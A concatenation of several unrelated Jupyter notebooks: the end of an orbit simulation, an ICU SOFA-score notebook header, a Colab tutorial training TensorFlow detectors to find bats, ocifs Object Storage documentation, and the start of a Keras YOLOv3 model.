s = "%6d\t%6.5f\t%6.5f\t%6d\t%6.5f\t%6.5f\t%6.5f\t%6.5f\t%6.5f\t%6.5f\t%6.5f\t%6.5f\n" % \
(istep,t,dt,p[i].istep,p[i].t,p[i].dt,p[i].x[0],p[i].x[1],v_drift[0],v_drift[1],p[i].a_g[0],p[i].a_g[1])
fp.write(s)
#close the file
fp.close()
def EvolveSolarSystem(p,n_planets,t_max):
#number of spatial dimensions
ndim = 2
#define the first timestep
dt = 0.5/365.25 #half a day, in years
#define the starting time
t = 0.0
#define the starting timestep
istep = 0
#save the initial conditions
SaveSolarSystem(p,n_planets,t,dt,istep,ndim)
#begin a loop over the global timescale
while(t<t_max):
#check to see if the next step exceeds the
#maximum time. If so, take a smaller step
if(t+dt>t_max):
dt = t_max - t #limit the step to align with t_max
#evolve each planet
for i in range(n_planets):
while(p[i].t<t+dt):
#special case for istep==0
if(p[i].istep==0):
#take the first step according to a verlet scheme
for k in range(ndim):
p[i].x[k] = x_first_step(p[i].x[k],p[i].v[k],p[i].a_g[k],p[i].dt)
#update the acceleration
p[i].a_g = SolarGravitationalAcceleration(p[i])
#update the time by 1/2dt
p[i].t += 0.5*p[i].dt
#update the timestep
p[i].dt = calc_dt(p[i])
#continue with a normal step
#limit to align with the global timestep
if(p[i].t + p[i].dt > t+dt):
p[i].dt = t+dt-p[i].t
#evolve the velocity
for k in range(ndim):
p[i].v[k] = v_full_step(p[i].v[k],p[i].a_g[k],p[i].dt)
#evolve the position
for k in range(ndim):
p[i].x[k] = x_full_step(p[i].x[k],p[i].v[k],p[i].a_g[k],p[i].dt)
#update the acceleration
p[i].a_g = SolarGravitationalAcceleration(p[i])
#update by dt
p[i].t += p[i].dt
#compute the new timestep
p[i].dt = calc_dt(p[i])
#update the planet's timestep
p[i].istep+=1
#now update the global system time
t+=dt
#update the global step number
istep += 1
#output the current state
SaveSolarSystem(p,n_planets,t,dt,istep,ndim)
#print the final steps and time
print("Time t = ",t)
print("Maximum t = ", t_max)
print("Maximum number of steps = ", istep)
#end of evolution
def read_twelve_arrays(fname):
fp = open(fname,"r")
fl = fp.readlines()
n = len(fl)
a = np.zeros(n)
b = np.zeros(n)
c = np.zeros(n)
d = np.zeros(n)
f = np.zeros(n)
g = np.zeros(n)
h = np.zeros(n)
j = np.zeros(n)
k = np.zeros(n)
l = np.zeros(n)
m = np.zeros(n)
p = np.zeros(n)
for i in range(n):
a[i] = float(fl[i].split()[0])
b[i] = float(fl[i].split()[1])
c[i] = float(fl[i].split()[2])
d[i] = float(fl[i].split()[3])
f[i] = float(fl[i].split()[4])
g[i] = float(fl[i].split()[5])
h[i] = float(fl[i].split()[6])
j[i] = float(fl[i].split()[7])
k[i] = float(fl[i].split()[8])
l[i] = float(fl[i].split()[9])
m[i] = float(fl[i].split()[10])
p[i] = float(fl[i].split()[11])
return a,b,c,d,f,g,h,j,k,l,m,p
#set the number of planets
n_planets = 3
#set the maximum time of the simulation
t_max = 2.0
#create empty list of planets
p = []
#set the planets
for i in range(n_planets):
#create an empty planet
ptmp = planet(0.0,0.0)
#set the planet properties
SetPlanet(ptmp,i)
#remember the planet
p.append(ptmp)
#evolve the solar system
EvolveSolarSystem(p,n_planets,t_max)
fname = "planet.Mercury.txt"
istepMg,tMg,dtMg,istepM,tM,dtM,xM,yM,vxM,vyM,axM,ayM = read_twelve_arrays(fname)
fname = "planet.Earth.txt"
istepEg,tEg,dtEg,istepE,tE,dtE,xE,yE,vxE,vyE,axE,ayE = read_twelve_arrays(fname)
fname = "planet.Venus.txt"
istepVg,tVg,dtVg,istepV,tV,dtV,xV,yV,vxV,vyV,axV,ayV = read_twelve_arrays(fname)
```
<img src="../../img/logo_amds.png" alt="Logo" style="width: 128px;"/>
# AmsterdamUMCdb - Freely Accessible ICU Database
version 1.0.2 March 2020
Copyright © 2003-2020 Amsterdam UMC - Amsterdam Medical Data Science
## Sequential Organ Failure Assessment (SOFA)
The sequential organ failure assessment score (SOFA score), originally published as the Sepsis-related Organ Failure Assessment score ([Vincent et al., 1996](http://link.springer.com/10.1007/BF01709751)), is a disease severity score designed to track the severity of critical illness throughout the ICU stay. In contrast to APACHE (II/IV), which only calculates a score for the first 24 hours, it can be used sequentially for every following day. The code performs some data cleanup and calculates the SOFA score for the first 24 hours of ICU admission for all patients in the database.
**Note**: Requires creating the [dictionaries](../../dictionaries/create_dictionaries.ipynb) before running this notebook.
## Imports
```
%matplotlib inline
import amsterdamumcdb
import psycopg2
import pandas as pd
import numpy as np
import re
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import matplotlib as mpl
import io
from IPython.display import display, HTML, Markdown
sofa = pd.read_csv('sofa/sofa.csv')
oxy_flow = pd.read_csv("sofa/oxy_flow.csv" )
sofa_respiration = pd.read_csv("sofa/sofa_respiration.csv" )
sofa_platelets = pd.read_csv("sofa/sofa_platelets.csv" )
sofa_bilirubin = pd.read_csv("sofa/sofa_bilirubin.csv" )
sofa_cardiovascular = pd.read_csv("sofa/sofa_cardiovascular.csv" )
mean_abp = pd.read_csv("sofa/mean_abp.csv" )
sofa_cardiovascular_map = pd.read_csv("sofa/sofa_cardiovascular_map.csv" )
gcs = pd.read_csv("sofa/gcs.csv" )
sofa_cns = pd.read_csv("sofa/sofa_cns.csv" )
sofa_renal_urine_output = pd.read_csv("sofa/sofa_renal_urine_output.csv" )
sofa_renal_daily_urine_output = pd.read_csv("sofa/sofa_renal_daily_urine_output.csv" )
creatinine = pd.read_csv("sofa/creatinine.csv" )
sofa_renal_creatinine = pd.read_csv("sofa/sofa_renal_creatinine.csv" )
sofa_renal = pd.read_csv("sofa/sofa_renal.csv" )
'''
bloc,icustayid,charttime,gender,age,elixhauser,re_admission,died_in_hosp,died_within_48h_of_out_time,
mortality_90d,delay_end_of_record_and_discharge_or_death,
Weight_kg,GCS,HR,SysBP,MeanBP,DiaBP,RR,SpO2,Temp_C,FiO2_1,Potassium,Sodium,Chloride,Glucose,
BUN,Creatinine,Magnesium,Calcium,Ionised_Ca,CO2_mEqL,SGOT,SGPT,Total_bili,Albumin,Hb,WBC_count,
Platelets_count,PTT,PT,INR,Arterial_pH,paO2,paCO2,Arterial_BE,Arterial_lactate,HCO3,mechvent,
Shock_Index,PaO2_FiO2,median_dose_vaso,max_dose_vaso,input_total,
input_4hourly,output_total,output_4hourly,cumulated_balance,SOFA,SIRS
'''
```
<a href="https://colab.research.google.com/github/aubricot/computer_vision_with_eol_images/blob/master/object_detection_for_image_cropping/chiroptera/chiroptera_train_tf2_ssd_rcnn.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Train Tensorflow Faster-RCNN and SSD models to detect bats (Chiroptera) from EOL images
---
*Last Updated 19 Oct 2021*
-Now runs in Python 3 with Tensorflow 2.0-
Use EOL user generated cropping coordinates to train Faster-RCNN and SSD Object Detection Models implemented in Tensorflow to detect bats from EOL images. Training data consists of the user-determined best square thumbnail crop of an image, so model outputs will also be a square around objects of interest.
Datasets were downloaded to Google Drive in [chiroptera_preprocessing.ipynb](https://github.com/aubricot/computer_vision_with_eol_images/blob/master/object_detection_for_image_cropping/chiroptera/chiroptera_preprocessing.ipynb).
***Models were trained in Python 2 and TF 1 in Jan 2020: RCNN trained for 2 days to 200,000 steps and SSD for 4 days to 450,000 steps.***
Notes:
* Before you start: change the runtime to "GPU" with "High RAM"
* Change parameters using form fields on right (/where you see 'TO DO' in code)
* For each 24 hour period on Google Colab, you have up to 12 hours of free GPU access.
References:
* [Official Tensorflow Object Detection API Instructions](https://tensorflow-object-detection-api-tutorial.readthedocs.io/en/latest/training.html)
* [Medium Blog on training using Tensorflow Object Detection API in Colab](https://medium.com/analytics-vidhya/training-an-object-detection-model-with-tensorflow-api-using-google-colab-4f9a688d5e8b)
## Installs & Imports
---
```
# Mount google drive to import/export files
from google.colab import drive
drive.mount('/content/drive', force_remount=True)
# For running inference on the TF-Hub module
import tensorflow as tf
import tensorflow_hub as hub
# For downloading and displaying images
import matplotlib
import matplotlib.pyplot as plt
import tempfile
import urllib
from urllib.request import urlretrieve
from six.moves.urllib.request import urlopen
from six import BytesIO
# For drawing onto images
from PIL import Image
from PIL import ImageColor
from PIL import ImageDraw
from PIL import ImageFont
from PIL import ImageOps
# For measuring the inference time
import time
# For working with data
import numpy as np
import pandas as pd
import os
import csv
# Print Tensorflow version
print('Tensorflow Version: %s' % tf.__version__)
# Check available GPU devices
print('The following GPU devices are available: %s' % tf.test.gpu_device_name())
# Define functions
# Read in data file exported from "Combine output files A-D" block above
def read_datafile(fpath, sep="\t", header=0, disp_head=True):
"""
Defaults to tab-separated data files with header in row 0
"""
try:
df = pd.read_csv(fpath, sep=sep, header=header)
if disp_head:
print("Data header: \n", df.head())
except FileNotFoundError as e:
raise Exception("File not found: Enter the path to your file in form field and re-run").with_traceback(e.__traceback__)
return df
# To load image in and do something with it
def load_img(path):
img = tf.io.read_file(path)
img = tf.image.decode_jpeg(img, channels=3)
return img
# To display loaded image
def display_image(image):
fig = plt.figure(figsize=(20, 15))
plt.grid(False)
plt.imshow(image)
# For reading in images from URL and passing through TF models for inference
def download_and_resize_image(url, new_width=256, new_height=256, #From URL
display=False):
_, filename = tempfile.mkstemp(suffix=".jpg")
response = urlopen(url)
image_data = response.read()
image_data = BytesIO(image_data)
pil_image = Image.open(image_data)
im_w, im_h = pil_image.size  # PIL's size is (width, height)
pil_image = ImageOps.fit(pil_image, (new_width, new_height), Image.LANCZOS)  # LANCZOS replaces the removed ANTIALIAS in newer Pillow
pil_image_rgb = pil_image.convert("RGB")
pil_image_rgb.save(filename, format="JPEG", quality=90)
#print("Image downloaded to %s." % filename)
if display:
display_image(pil_image)
return filename, im_h, im_w
# Download, compile and build the Tensorflow Object Detection API (takes 4-9 minutes)
# TO DO: Type in the path to your working directory in form field to right
basewd = "/content/drive/MyDrive/train" #@param {type:"string"}
%cd $basewd
# Set up directory for TF2 Model Garden
# TO DO: Type in the folder you would like to contain TF2
folder = "tf2" #@param {type:"string"}
if not os.path.exists(folder):
os.makedirs(folder)
%cd $folder
os.makedirs("tf_models", exist_ok=True)
%cd tf_models
# Clone the Tensorflow Model Garden
!git clone --depth 1 https://github.com/tensorflow/models/
%cd ../..
# Build the Object Detection API
wd = basewd + '/' + folder
%cd $wd
!cd tf_models/models/research/ && protoc object_detection/protos/*.proto --python_out=. && cp object_detection/packages/tf2/setup.py . && python -m pip install .
```
## Model preparation (only run once)
---
These blocks download and set up the files needed for training object detectors. After running once, you can train and re-train as many times as you'd like.
### Download and extract pre-trained models
```
# Download pre-trained models from Tensorflow Object Detection Model Zoo
# https://github.com/tensorflow/models/blob/master/research/object_detection/g3doc/tf2_detection_zoo.md
# SSD and Faster-RCNN used as options below
# modified from https://github.com/RomRoc/objdet_train_tensorflow_colab/blob/master/objdet_custom_tf_colab.ipynb
import shutil
import glob
import tarfile
# CD to folder where TF models are installed (tf2)
%cd $wd
# Make folders for your training files for each model
# Faster RCNN Model
if not (os.path.exists('tf_models/train_demo')):
!mkdir tf_models/train_demo
if not (os.path.exists('tf_models/train_demo/rcnn')):
!mkdir tf_models/train_demo/rcnn
if not (os.path.exists('tf_models/train_demo/rcnn/pretrained_model')):
!mkdir tf_models/train_demo/rcnn/pretrained_model
if not (os.path.exists('tf_models/train_demo/rcnn/finetuned_model')):
!mkdir tf_models/train_demo/rcnn/finetuned_model
if not (os.path.exists('tf_models/train_demo/rcnn/trained')):
!mkdir tf_models/train_demo/rcnn/trained
# Download the model
MODEL = 'faster_rcnn_resnet50_v1_640x640_coco17_tpu-8'
MODEL_FILE = MODEL + '.tar.gz'
DOWNLOAD_BASE = 'http://download.tensorflow.org/models/object_detection/tf2/20200711/'
DEST_DIR = 'tf_models/train_demo/rcnn/pretrained_model'
if not (os.path.exists(MODEL_FILE)):
urlretrieve(DOWNLOAD_BASE + MODEL_FILE, MODEL_FILE)
tar = tarfile.open(MODEL_FILE)
tar.extractall()
tar.close()
os.remove(MODEL_FILE)
if (os.path.exists(DEST_DIR)):
shutil.rmtree(DEST_DIR)
os.rename(MODEL, DEST_DIR)
# SSD Model
if not (os.path.exists('tf_models/train_demo/ssd')):
!mkdir tf_models/train_demo/ssd
if not (os.path.exists('tf_models/train_demo/ssd/pretrained_model')):
!mkdir tf_models/train_demo/ssd/pretrained_model
if not (os.path.exists('tf_models/train_demo/ssd/finetuned_model')):
!mkdir tf_models/train_demo/ssd/finetuned_model
if not (os.path.exists('tf_models/train_demo/ssd/trained')):
!mkdir tf_models/train_demo/ssd/trained
# Download the model
MODEL = 'ssd_mobilenet_v2_320x320_coco17_tpu-8'
MODEL_FILE = MODEL + '.tar.gz'
DOWNLOAD_BASE = 'http://download.tensorflow.org/models/object_detection/tf2/20200711/'
DEST_DIR = 'tf_models/train_demo/ssd/pretrained_model'
if not (os.path.exists(MODEL_FILE)):
urlretrieve(DOWNLOAD_BASE + MODEL_FILE, MODEL_FILE)
tar = tarfile.open(MODEL_FILE)
tar.extractall()
tar.close()
os.remove(MODEL_FILE)
if (os.path.exists(DEST_DIR)):
shutil.rmtree(DEST_DIR)
os.rename(MODEL, DEST_DIR)
```
### Convert training data to tf.record format
1) Download generate_tfrecord.py using code block below
2) Open the Colab file explorer on the right and navigate to your current working directory
3) Double click on generate_tfrecord.py to open it in the Colab text editor.
4) Modify the file for your train dataset:
* update label names to the class(es) of interest at line 31 (Chiroptera)
# TO-DO replace this with label map
def class_text_to_int(row_label):
if row_label == 'Chiroptera':
return 1
else:
return None
* update the filepath where you want your train tf.record file to save at line 85
# TO-DO replace path with your filepath
def main(_):
writer = tf.python_io.TFRecordWriter('/content/drive/MyDrive/[yourfilepath]/tf.record')
5) Close Colab text editor and proceed with steps below to generate tf.record files for your test and train datasets
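If you later train on more than one class, the `class_text_to_int` edit above generalizes naturally to a dict lookup. A sketch of the modified function (any label names beyond `Chiroptera` are hypothetical):

```python
# Hypothetical multi-class label map for generate_tfrecord.py
LABELS = {'Chiroptera': 1}   # add e.g. 'Aves': 2 for a second class

def class_text_to_int(row_label):
    # Returns None for labels not in the map, matching the original behaviour
    return LABELS.get(row_label)

print(class_text_to_int('Chiroptera'))  # 1
print(class_text_to_int('unknown'))     # None
```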
```
# Download chiroptera_generate_tfrecord.py to your wd in Google Drive
# Follow directions above to modify the file for your dataset
!gdown --id 1fVXeuk7ALHTlTLK3GGH8p6fMHuuWt1Sr
# Convert crops_test to tf.record format for test data
# Modified from https://tensorflow-object-detection-api-tutorial.readthedocs.io/en/latest/training.html
# TO DO: Update file paths in form fields
csv_input = "/content/drive/MyDrive/train/tf2/pre-processing/Chiroptera_crops_test_notaug_oob_rem_fin.csv" #@param {type:"string"}
output_path = "/content/drive/MyDrive/train/tf2/test_images/tf.record" #@param {type:"string"}
test_image_dir = "/content/drive/MyDrive/train/tf2/test_images" #@param {type:"string"}
!python chiroptera_generate_tfrecord.py --csv_input=$csv_input --output_path=$output_path --image_dir=$test_image_dir
# Move tf.record for test images to test images directory
!mv tf.record $test_image_dir
# Convert crops_train to tf.record format for train data
# Modified from https://tensorflow-object-detection-api-tutorial.readthedocs.io/en/latest/training.html
# TO DO: Update file paths in form fields
csv_input = "/content/drive/MyDrive/train/tf2/pre-processing/Chiroptera_crops_train_aug_oob_rem_fin.csv" #@param {type:"string"}
output_path = "/content/drive/MyDrive/train/tf2/images/tf.record" #@param {type:"string"}
train_image_dir = "/content/drive/MyDrive/train/tf2/images" #@param {type:"string"}
!python chiroptera_generate_tfrecord.py --csv_input=$csv_input --output_path=$output_path --image_dir=$train_image_dir
# Move tf.record for training images to train images directory
!mv tf.record $train_image_dir
```
### Make label map for class Chiroptera
```
%%writefile labelmap.pbtxt
item {
id: 1
name: 'Chiroptera'
}
```
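The Object Detection API parses this file itself (via its `label_map_util`); as a quick sanity check, a minimal stdlib parser for the simple one-item format above might look like this (a sketch, not the official parser):

```python
import re

def parse_labelmap(pbtxt_text):
    """Minimal parser for simple labelmap.pbtxt files: returns {name: id}.
    Assumes one 'id' and one 'name' per item block, as in the file above."""
    ids = [int(m) for m in re.findall(r"id:\s*(\d+)", pbtxt_text)]
    names = re.findall(r"name:\s*'([^']+)'", pbtxt_text)
    return dict(zip(names, ids))

labelmap = """
item {
  id: 1
  name: 'Chiroptera'
}
"""
print(parse_labelmap(labelmap))  # {'Chiroptera': 1}
```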
### Modify model config files for training Faster-RCNN and SSD with your dataset
If you get errors during training, check the pipeline_config_path and model_dir in the config files for the SSD or Faster-RCNN model
```
# Adjust model config file based on training/testing datasets
# Modified from https://stackoverflow.com/a/63645324
from google.protobuf import text_format
from object_detection.protos import pipeline_pb2
%cd $wd
# TO DO: Adjust parameters ## add form fields here
filter = "Chiroptera" #@param {type:"string"}
config_basepath = "tf_models/train_demo/" #@param {type:"string"}
label_map = 'labelmap.pbtxt'
train_tfrecord_path = "/content/drive/MyDrive/train/tf2/images/tf.record" #@param {type:"string"}
test_tfrecord_path = "/content/drive/MyDrive/train/tf2/test_images/tf.record" #@param {type:"string"}
ft_ckpt_basepath = "/content/drive/MyDrive/train/tf2/tf_models/train_demo/" #@param {type:"string"}
ft_ckpt_type = "detection" #@param ["detection", "classification"]
num_classes = 1 #@param
batch_size = 1 #@param ["1", "4", "8", "16", "32", "64", "128"] {type:"raw"}
# Define pipeline for modifying model config files
def read_config(model_config):
if 'rcnn/' in model_config:
model_ckpt = 'rcnn/pretrained_model/checkpoint/ckpt-0'
elif 'ssd/' in model_config:
model_ckpt = 'ssd/pretrained_model/checkpoint/ckpt-0'
config_fpath = config_basepath + model_config
pipeline = pipeline_pb2.TrainEvalPipelineConfig()
with tf.io.gfile.GFile(config_fpath, "r") as f:
proto_str = f.read()
text_format.Merge(proto_str, pipeline)
return pipeline, model_ckpt, config_fpath
def modify_config(pipeline, model_ckpt, ft_ckpt_basepath):
finetune_checkpoint = ft_ckpt_basepath + model_ckpt
    # Set num_classes on whichever meta-architecture this config uses (SSD configs have no faster_rcnn field)
    if pipeline.model.HasField('faster_rcnn'):
        pipeline.model.faster_rcnn.num_classes = num_classes
    else:
        pipeline.model.ssd.num_classes = num_classes
pipeline.train_config.fine_tune_checkpoint = finetune_checkpoint
pipeline.train_config.fine_tune_checkpoint_type = ft_ckpt_type
pipeline.train_config.batch_size = batch_size
pipeline.train_config.use_bfloat16 = False # True only if training on TPU
pipeline.train_input_reader.label_map_path = label_map
pipeline.train_input_reader.tf_record_input_reader.input_path[0] = train_tfrecord_path
pipeline.eval_input_reader[0].label_map_path = label_map
pipeline.eval_input_reader[0].tf_record_input_reader.input_path[0] = test_tfrecord_path
return pipeline
def write_config(pipeline, config_fpath):
config_outfpath = os.path.splitext(config_fpath)[0] + '_' + filter + '.config'
config_text = text_format.MessageToString(pipeline)
with tf.io.gfile.GFile(config_outfpath, "wb") as f:
f.write(config_text)
return config_outfpath
def setup_pipeline(model_config, ft_ckpt_basepath):
print('\n Modifying model config file for {}'.format(model_config))
pipeline, model_ckpt, config_fpath = read_config(model_config)
pipeline = modify_config(pipeline, model_ckpt, ft_ckpt_basepath)
config_outfpath = write_config(pipeline, config_fpath)
print(' Modified model config file saved to {}'.format(config_outfpath))
if config_outfpath:
return "Success!"
else:
return "Fail: try again"
# Modify model configs
model_configs = ['rcnn/pretrained_model/pipeline.config', 'ssd/pretrained_model/pipeline.config']
[setup_pipeline(model_config, ft_ckpt_basepath) for model_config in model_configs]
```
## Train
---
```
# Determine how many train and eval steps to use based on dataset size
# TO DO: Only need to update path if you didn't just run "Model Preparation" block above
try:
train_image_dir
except NameError:
train_image_dir = "/content/drive/MyDrive/train/tf2/images" #@param {type:"string"}
examples = len(os.listdir(train_image_dir))
print("Number of train examples: \n", examples)
# Get the number of testing examples
# TO DO: Only need to update path if you didn't just run "Model Preparation" block above
try:
test_image_dir
except NameError:
test_image_dir = "/content/drive/MyDrive/train/tf2/test_images" #@param {type:"string"}
test_examples = len(os.listdir(test_image_dir))
print("Number of test examples: \n", test_examples)
# Get the training batch size
# TO DO: Only need to update value if you didn't just run "Model Preparation" block above
try:
batch_size
except NameError:
batch_size = 1 #@param ["1", "4", "8", "16", "32", "64", "128"] {type:"raw"}
print("Batch size: \n", batch_size)
# Calculate roughly how many steps to use for training and testing
steps_per_epoch = examples / batch_size
num_eval_steps = test_examples / batch_size
print("Number of steps per training epoch: \n", int(steps_per_epoch))
print("Number of evaluation steps: \n", int(num_eval_steps))
# TO DO: Choose how many epochs to train for
epochs = 410 #@param {type:"slider", min:10, max:1000, step:100}
num_train_steps = int(epochs * steps_per_epoch)
num_eval_steps = int(num_eval_steps)
# TO DO: Choose paths for RCNN or SSD model
pipeline_config_path = "tf_models/train_demo/rcnn/pretrained_model/pipeline_Chiroptera.config" #@param ["tf_models/train_demo/rcnn/pretrained_model/pipeline_Chiroptera.config", "tf_models/train_demo/ssd/pretrained_model/pipeline_Chiroptera.config"]
model_dir = "tf_models/train_demo/rcnn/trained" #@param ["tf_models/train_demo/rcnn/trained", "tf_models/train_demo/ssd/trained"]
output_directory = "tf_models/train_demo/rcnn/finetuned_model" #@param ["tf_models/train_demo/rcnn/finetuned_model", "tf_models/train_demo/ssd/finetuned_model"]
trained_checkpoint_dir = "tf_models/train_demo/rcnn/trained" #@param ["tf_models/train_demo/rcnn/trained", "tf_models/train_demo/ssd/trained"] {allow-input: true}
# Save vars to environment for access with cmd line tools below
os.environ["trained_checkpoint_dir"] = trained_checkpoint_dir
os.environ["num_train_steps"] = str(num_train_steps)
os.environ["num_eval_steps"] = str(num_eval_steps)
os.environ["pipeline_config_path"] = pipeline_config_path
os.environ["model_dir"] = model_dir
os.environ["output_directory"] = output_directory
# Optional: Visualize training progress with Tensorboard
# Load the TensorBoard notebook extension
%load_ext tensorboard
# Log training progress using TensorBoard
%tensorboard --logdir $model_dir
# Actual training
# Note: You can change the number of epochs in code block below and re-run to train longer
# Modified from https://github.com/RomRoc/objdet_train_tensorflow_colab/blob/master/objdet_custom_tf_colab.ipynb
matplotlib.use('Agg')
%cd $wd
!python tf_models/models/research/object_detection/model_main_tf2.py \
--alsologtostderr \
--num_train_steps=$num_train_steps \
--num_eval_steps=$num_eval_steps \
--pipeline_config_path=$pipeline_config_path \
--model_dir=$model_dir
# Export trained model
# Modified from https://github.com/RomRoc/objdet_train_tensorflow_colab/blob/master/objdet_custom_tf_colab.ipynb
%cd $wd
# Save the model
!python tf_models/models/research/object_detection/exporter_main_v2.py \
--input_type image_tensor \
--pipeline_config_path=$pipeline_config_path \
--trained_checkpoint_dir=$trained_checkpoint_dir \
--output_directory=$output_directory
# Evaluate trained model to get mAP and IoU stats for COCO 2017
# Change pipeline_config_path and checkpoint_dir when switching between SSD and Faster-RCNN models
matplotlib.use('Agg')
!python tf_models/models/research/object_detection/model_main_tf2.py \
--alsologtostderr \
--model_dir=$model_dir \
--pipeline_config_path=$pipeline_config_path \
--checkpoint_dir=$trained_checkpoint_dir
```
|
github_jupyter
|
Copyright (c) 2021, 2022 Oracle and/or its affiliates.
Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/
## Unix Operations
_Important: The ocifs SDK isn't a one-to-one adaptor of OCI Object Storage and UNIX filesystem operations. It's a set of convenient wrappers that help Pandas read natively from Object Storage. It supports many of the common UNIX functions and much of the Object Storage API, though not all of either._
Following are examples of some of the most popular filesystem and file methods. First, you must instantiate your region-specific filesystem instance:
```
from ocifs import OCIFileSystem
fs = OCIFileSystem(config="~/.oci/config")
```
### Filesystem Operations
#### list
List the files in a bucket or subdirectory using `ls`:
```
fs.ls("bucket@namespace/")
# ['bucket@namespace/file.txt',
# 'bucket@namespace/data.csv',
# 'bucket@namespace/folder1/',
# 'bucket@namespace/folder2/']
```
`ls` accepts the following arguments: 1) `compartment_id`: a specific compartment from which to list; 2) `detail`: if true, return a list of dictionaries with various details about each object; 3) `refresh`: if true, ignore the cache and pull fresh.
```
fs.ls("bucket@namespace/", detail=True)
# [{'name': 'bucket@namespace/file.txt',
# 'etag': 'abcdefghijklmnop',
# 'type': 'file',
# 'timeCreated': <timestamp when artifact created>,
# ... },
# ...
# ]
```
#### touch
The UNIX `touch` command creates empty files in Object Storage. The `data` parameter accepts a bytestream and writes it to the new file.
```
fs.touch("bucket@namespace/newfile", data=b"Hello World!")
fs.cat("bucket@namespace/newfile")
# "Hello World!"
```
#### copy
The `copy` method is a popular UNIX method, and it has a special role in ocifs as the only method capable of cross-tenancy calls. Your IAM Policy must permit you to read and write cross-region to use the `copy` method cross-region. Note: Another benefit of `copy` is that it can move large data between locations in Object Storage without needing to store anything locally.
```
fs.copy("bucket@namespace/newfile", "bucket@namespace/newfile-sydney",
destination_region="ap-sydney-1")
```
#### rm
The `rm` method is another essential UNIX filesystem method. It accepts one additional argument (beyond the path), `recursive`. When `recursive=True`, it is equivalent to an `rm -rf` command. It deletes all files underneath the prefix.
```
fs.exists("oci://bucket@namespace/folder/file")
# True
fs.rm("oci://bucket@namespace/folder", recursive=True)
fs.exists("oci://bucket@namespace/folder/file")
# False
```
#### glob
Fsspec implementations, including ocifs, support UNIX glob patterns; see [Globbing](https://man7.org/linux/man-pages/man7/glob.7.html).
```
fs.glob("oci://bucket@namespace/folder/*.csv")
# ["bucket@namespace/folder/part1.csv", "bucket@namespace/folder/part2.csv"]
```
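The same wildcard semantics can be previewed locally with the stdlib `fnmatch` module (a rough sketch: fsspec's glob additionally treats `/` specially and supports `**`, which plain `fnmatch` does not):

```python
from fnmatch import fnmatch

paths = [
    "bucket@namespace/folder/part1.csv",
    "bucket@namespace/folder/part2.csv",
    "bucket@namespace/folder/notes.txt",
]
# Within a single folder, the '*.csv' pattern behaves like fnmatch:
matches = [p for p in paths if fnmatch(p, "bucket@namespace/folder/*.csv")]
print(matches)  # the two .csv paths
```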
Dask has special support for reading from and writing to a set of files using glob expressions (Pandas doesn't support glob), see [Dask's Glob support](https://docs.dask.org/en/latest/remote-data-services.html).
```
from dask import dataframe as dd
ddf = dd.read_csv("oci://bucket@namespace/folder/*.csv")
ddf.to_csv("oci://bucket@namespace/folder_copy/*.csv")
```
#### walk
Use the UNIX `walk` method for iterating through the subdirectories of a given path. This is a valuable method for determining every file within a bucket or folder.
```
fs.walk("oci://bucket@namespace/folder")
# ["bucket@namespace/folder/part1.csv", "bucket@namespace/folder/part2.csv",
# "bucket@namespace/folder/subdir/file1.csv", "bucket@namespace/folder/subdir/file2.csv"]
```
#### open
This method opens a file and returns an `OCIFile` object. There are examples of what you can do with an `OCIFile` in the next section.
### File Operations
After calling open, you get an `OCIFile` object, which is subclassed from fsspec's `AbstractBufferedFile`. This file object can do almost everything a UNIX file can. Following are a few examples; see [a full list of methods](https://filesystem-spec.readthedocs.io/en/latest/api.html?highlight=AbstractFileSystem#fsspec.spec.AbstractBufferedFile).
#### read
The `read` method works exactly as you would expect with a UNIX file:
```
import fsspec
with fsspec.open("oci://bucket@namespace/folder/file", 'rb') as f:
buffer = f.read()
with fs.open("oci://bucket@namespace/folder/file", 'rb') as f:
buffer = f.read()
file = fs.open("oci://bucket@namespace/folder/file")
buffer = file.read()
file.close()
```
#### seek
The `seek` method is also valuable in navigating files:
```
fs.touch("bucket@namespace/newfile", data=b"Hello World!")
with fs.open("bucket@namespace/newfile") as f:
f.seek(3)
print(f.read(1))
f.seek(0)
print(f.read(1))
# l
# H
```
#### write
You can use the `write` operation:
```
with fsspec.open("oci://bucket@namespace/newfile", 'wb') as f:
buffer = f.write(b"new text")
with fsspec.open("oci://bucket@namespace/newfile", 'rb') as f:
assert f.read() == b"new text"
```
### Learn More
There are many more operations that you can use with `ocifs`, see the [AbstractBufferedFile spec](https://filesystem-spec.readthedocs.io/en/latest/api.html?highlight=AbstractFileSystem#fsspec.spec.AbstractBufferedFile) and the [AbstractFileSystem spec](https://filesystem-spec.readthedocs.io/en/latest/api.html?highlight=AbstractFileSystem#fsspec.spec.AbstractFileSystem).
|
github_jupyter
|
## **Yolov3 Algorithm**
```
import struct
import numpy as np
import pandas as pd
import os
from keras.layers import Conv2D
from keras.layers import Input
from keras.layers import BatchNormalization
from keras.layers import LeakyReLU
from keras.layers import ZeroPadding2D
from keras.layers import UpSampling2D
from keras.layers.merge import add, concatenate
from keras.models import Model
```
**Access Google Drive**
```
# Load the Drive helper and mount
from google.colab import drive
drive.mount('/content/drive')
```
**Residual Block**
Formula: y = F(x) + x
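A toy numeric sketch of the skip connection: the block only has to learn the residual F(x), while the input x passes through unchanged alongside it (F here is an arbitrary stand-in for the conv stack):

```python
# Residual connection y = F(x) + x, illustrated with plain lists
def F(x):                       # stand-in for the conv layers inside the block
    return [2 * v for v in x]

x = [1, 2, 3]
y = [f + xi for f, xi in zip(F(x), x)]  # element-wise F(x) + x
print(y)  # [3, 6, 9]
```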
```
def _conv_block(inp, convs, skip=True):
x = inp
count = 0
for conv in convs:
if count == (len(convs) - 2) and skip:
skip_connection = x
count += 1
if conv['stride'] > 1: x = ZeroPadding2D(((1,0),(1,0)))(x) # pad top and left, as Darknet does
x = Conv2D(conv['filter'],
conv['kernel'],
strides=conv['stride'],
padding='valid' if conv['stride'] > 1 else 'same', # padding as darknet prefer left and top
name='conv_' + str(conv['layer_idx']),
use_bias=False if conv['bnorm'] else True)(x)
if conv['bnorm']: x = BatchNormalization(epsilon=0.001, name='bnorm_' + str(conv['layer_idx']))(x)
if conv['leaky']: x = LeakyReLU(alpha=0.1, name='leaky_' + str(conv['layer_idx']))(x)
return add([skip_connection, x]) if skip else x
```
**Create Yolov3 Architecture**
Three output layers: 82, 94, 106
```
def make_yolov3_model():
input_image = Input(shape=(None, None, 3))
# Layer 0 => 4
